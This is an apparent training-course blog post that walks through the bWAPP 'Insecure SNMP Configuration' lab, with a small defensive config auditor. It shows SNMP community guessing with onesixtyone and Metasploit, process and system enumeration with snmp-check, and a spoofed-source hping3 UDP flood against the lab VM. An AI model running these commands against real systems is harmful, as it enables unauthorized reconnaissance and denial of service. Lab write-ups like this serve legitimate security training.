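Information Security (old version) / bWAPP 2019. 2. 16. 13:13

Web Hacking bWAPP - 72. A5 - Security Misconfiguration - Insecure SNMP Configuration

This material is put together for hands-on practice required in a training course. Please be aware that if it is used for personal purposes or with malicious intent, legal responsibility lies with the user.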

 

 

1. Security Misconfiguration

 

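 - OWASP Top10 A5 - Security Misconfiguration
 - A vulnerability caused by configuration errors in servers, systems, databases, network devices, or web settings.
 - Ex) Directory listing, error pages, web page comments, web server default settings, Adobe Flash vulnerabilities, DoS/DDoS attacks, Reverse_TCP attacks against specific services, local privilege vulnerabilities, backup/temporary/robots files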


 

 

2. Insecure SNMP Configuration

 

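 - SNMP has the problem that the community value, which acts as a pre-shared key between the manager and the agent, is left at its default value or is transmitted in plaintext.

 - Through this, an attacker can obtain the community value, view information about systems/devices, and execute commands on them.

 - In addition, SNMP messages can be used to carry out DoS/DDoS attacks.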
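
The weaknesses listed above can be checked on the agent side. The following is an added example, not part of the original post: a small auditor for net-snmp `snmpd.conf` text that flags default community names, read-write communities, and communities without a source restriction. The function name and both sample configurations are constructed for illustration; the page does not show bee-box's actual configuration file.

```python
DEFAULT_NAMES = {"public", "private"}            # the two communities found on this page
OPEN_SOURCES = {"default", "0.0.0.0/0", "::/0"}  # "any host" in net-snmp source syntax
COMMUNITY_DIRECTIVES = ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6")

def audit_snmpd_conf(text):
    """Return (line_no, issue) findings for community settings in snmpd.conf text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()    # drop comments, split on whitespace
        if not fields:
            continue
        directive, args = fields[0].lower(), fields[1:]
        if directive in COMMUNITY_DIRECTIVES:
            # rocommunity COMMUNITY [SOURCE [OID]]; a missing SOURCE means "default"
            community = args[0] if args else ""
            source = args[1] if len(args) > 1 else "default"
            if directive.startswith("rw"):
                findings.append((no, "read-write community allows SNMP SET"))
        elif directive == "com2sec":
            # com2sec [-Cn CONTEXT] SECNAME SOURCE COMMUNITY
            if args[:1] == ["-Cn"]:
                args = args[2:]
            if len(args) < 3:
                continue
            source, community = args[1], args[2]
        else:
            continue
        if community.lower() in DEFAULT_NAMES:
            findings.append((no, f"default community name '{community}'"))
        if source in OPEN_SOURCES:
            findings.append((no, "no source restriction"))
    return findings

# Constructed weak config: private = read-write, public = read-only, any source.
WEAK = """\
rwcommunity private
rocommunity public default
"""

# Constructed hardened config: SNMPv3 user with auth + privacy, no communities.
# The passphrases are placeholders, not real values.
HARDENED = """\
createUser monitor SHA "AUTH-PASSPHRASE-PLACEHOLDER" AES "PRIV-PASSPHRASE-PLACEHOLDER"
rouser monitor priv
"""

if __name__ == "__main__":
    for line_no, issue in audit_snmpd_conf(WEAK):
        print(f"line {line_no}: {issue}")
```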


 

 

3. Security Misconfiguration - Insecure SNMP Configuration

 

 - This scenario covers obtaining system information by using SNMP communities and SNMP messages.

 

 

Ex1) Understanding Security Misconfiguration - Insecure SNMP Configuration I

Select the security level and the scenario

Hint: Enumerate the connected/running HTTP processes...?

Install SNMP on bWAPP

bee@bee-box:/var/www/bWAPP$ sudo apt-get install snmp
[sudo] password for bee: bug
Reading package lists... Done
Building dependency tree      
Reading state information... Done
The following NEW packages will be installed:
  snmp
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 158kB of archives.
After this operation, 582kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
  snmp
Install these packages without verification [y/N]? y
Get:1 http://old-releases.ubuntu.com hardy/main snmp 5.4.1~dfsg-4ubuntu4 [158kB]
Fetched 158kB in 1s (96.4kB/s)                          
Selecting previously deselected package snmp.
(Reading database ... 105451 files and directories currently installed.)
Unpacking snmp (from .../snmp_5.4.1~dfsg-4ubuntu4_i386.deb) ...
Setting up snmp (5.4.1~dfsg-4ubuntu4) ... 

 

 

 

Check the bWAPP SNMP information

bee@bee-box:~$ snmpwalk -Os -c public -v 1 localhost system
sysDescr.0 = STRING: Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
sysObjectID.0 = OID: netSnmpAgentOIDs.10
sysUpTimeInstance = Timeticks: (2826951) 7:51:09.51
sysContact.0 = STRING: Your master bee
sysName.0 = STRING: bee-box
sysLocation.0 = STRING: Every bee needs a home!
sysORLastChange.0 = Timeticks: (16) 0:00:00.16
sysORID.1 = OID: snmpFrameworkMIBCompliance
sysORID.2 = OID: snmpMPDCompliance
sysORID.3 = OID: usmMIBCompliance
sysORID.4 = OID: snmpMIB
sysORID.5 = OID: tcpMIB
sysORID.6 = OID: ip
sysORID.7 = OID: udpMIB
sysORID.8 = OID: vacmBasicGroup
sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
sysORDescr.5 = STRING: The MIB module for managing TCP implementations
sysORDescr.6 = STRING: The MIB module for managing IP and ICMP implementations
sysORDescr.7 = STRING: The MIB module for managing UDP implementations
sysORDescr.8 = STRING: View-based Access Control Model for SNMP.
sysORUpTime.1 = Timeticks: (16) 0:00:00.16
sysORUpTime.2 = Timeticks: (16) 0:00:00.16
sysORUpTime.3 = Timeticks: (16) 0:00:00.16
sysORUpTime.4 = Timeticks: (16) 0:00:00.16
sysORUpTime.5 = Timeticks: (16) 0:00:00.16
sysORUpTime.6 = Timeticks: (16) 0:00:00.16
sysORUpTime.7 = Timeticks: (16) 0:00:00.16
sysORUpTime.8 = Timeticks: (16) 0:00:00.16
bee@bee-box:~$ 

 

 

 

Run Wireshark and capture on eth1

root@kali:~/slowloris.pl# wireshark &
[2] 1342
 

 

 

 

Obtain the SNMP community

root@kali:~# cd /usr/share/doc/onesixtyone/

root@kali:/usr/share/doc/onesixtyone# onesixtyone -c dict.txt 192.168.20.205
Scanning 1 hosts, 49 communities
192.168.20.205 [private] Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
192.168.20.205 [public] Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686 

 

root@kali:/usr/share/doc/onesixtyone# cd
root@kali:~#

 

 

 

Confirm community 'private'

Confirm community 'public'

 

 

 

Check detailed bWAPP information using snmp-check

root@kali:~# snmp-check 192.168.20.205 -c public -p 161 | more
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.20.205:161 using SNMPv1 and community 'public'

 

[*] System information:

 

  Host IP address               : 192.168.20.205
  Hostname                      : bee-box
  Description                   : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr
 10 13:23:42 UTC 2008 i686
  Contact                       : Your master bee
  Location                      : Every bee needs a home!
  Uptime snmp                   : 08:06:35.25
  Uptime system                 : 08:05:31.02
  System date                   : 2019-2-19 11:13:50.0

 

[*] Network information:

 

  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 2910511
  TCP segments sent             : 265053
--More--

 

~ (middle of output omitted) ~
 

 

 

 

Check detailed bWAPP Apache2 information using snmp-check

root@kali:~# snmp-check 192.168.20.205 -c public -p 161 > bWAPP.snmp
root@kali:~# cat bWAPP.snmp | head -101 | tail -3 ; cat bWAPP.snmp | grep apache2
[*] Processes:

  Id                    Status                Name                  Path                  Parameters         
  6892                  runnable              apache2               /usr/sbin/apache2     -k start           
  6895                  runnable              apache2               /usr/sbin/apache2     -k start           
  6898                  runnable              apache2               /usr/sbin/fcgi-pm     -k start           
  7018                  runnable              apache2               /usr/sbin/apache2     -k start           
  7019                  runnable              apache2               /usr/sbin/apache2     -k start           
  7020                  runnable              apache2               /usr/sbin/apache2     -k start           
  7021                  runnable              apache2               /usr/sbin/apache2     -k start           
  7022                  runnable              apache2               /usr/sbin/apache2     -k start           
  9904                  runnable              apache2               /usr/sbin/apache2     -k start           
  9937                  runnable              apache2               /usr/sbin/apache2     -k start           
  9938                  runnable              apache2               /usr/sbin/apache2     -k start           
  9939                  runnable              apache2               /usr/sbin/apache2     -k start           
root@kali:~#

 

 

 

Ex2) Understanding Security Misconfiguration - Insecure SNMP Configuration II

Obtain the SNMP community

root@kali:~# msfconsole -q


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.20.205
rhosts => 192.168.20.205

 

msf auxiliary(scanner/snmp/snmp_login) > exploit

[!] No active DB -- Credential data will not be saved!
[+] 192.168.20.205:161 - Login Successful: private (Access level: read-write); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[+] 192.168.20.205:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) >

msf auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum


msf auxiliary(scanner/snmp/snmp_enum) >
msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_enum) > exploit


[+] 192.168.20.205, Connected.

 

[*] System information:

 

Host IP                       : 192.168.20.205
Hostname                      : bee-box
Description                   : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
Contact                       : Your master bee
Location                      : Every bee needs a home!
Uptime snmp                   : 09:28:39.48
Uptime system                 : 09:27:35.24
System date                   : 2019-2-19 12:35:54.0

 

~ (middle of output omitted) ~

 

msf auxiliary(scanner/snmp/snmp_enum) >

msf auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/snmp/snmp_enumusers

msf auxiliary(scanner/snmp/snmp_enumusers) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/snmp/snmp_enumusers) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

msf auxiliary(scanner/snmp/snmp_enumusers) >quit
root@kali:~#  

 

 

 

 

Ex3) Understanding Security Misconfiguration - Insecure SNMP Configuration III

 

 

bee@bee-box:~$ gnome-system-monitor &
[1] 4342

 

 

Run the system monitoring tool on bWAPP

Perform the UDP flooding attack

root@kali:~# hping3 --udp 192.168.20.205 -p 161 -a 1.2.3.4 --flood
HPING 192.168.20.205 (eth1 192.168.20.205): udp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown

(Ctrl+C)


--- 192.168.20.205 hping statistic ---
1588649 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~# 

 

 

 

Confirm the load generated on bWAPP

[YouTube] Video lecture link (Subscribe! Like!!!)

Web Hacking 72. A5 - bWAPP Security Misconfiguration - Insecure SNMP Configuration   https://youtu.be/33Q4QvDoAU4

Posted by instructor 김정우 (KakaoTalk: kim10322)
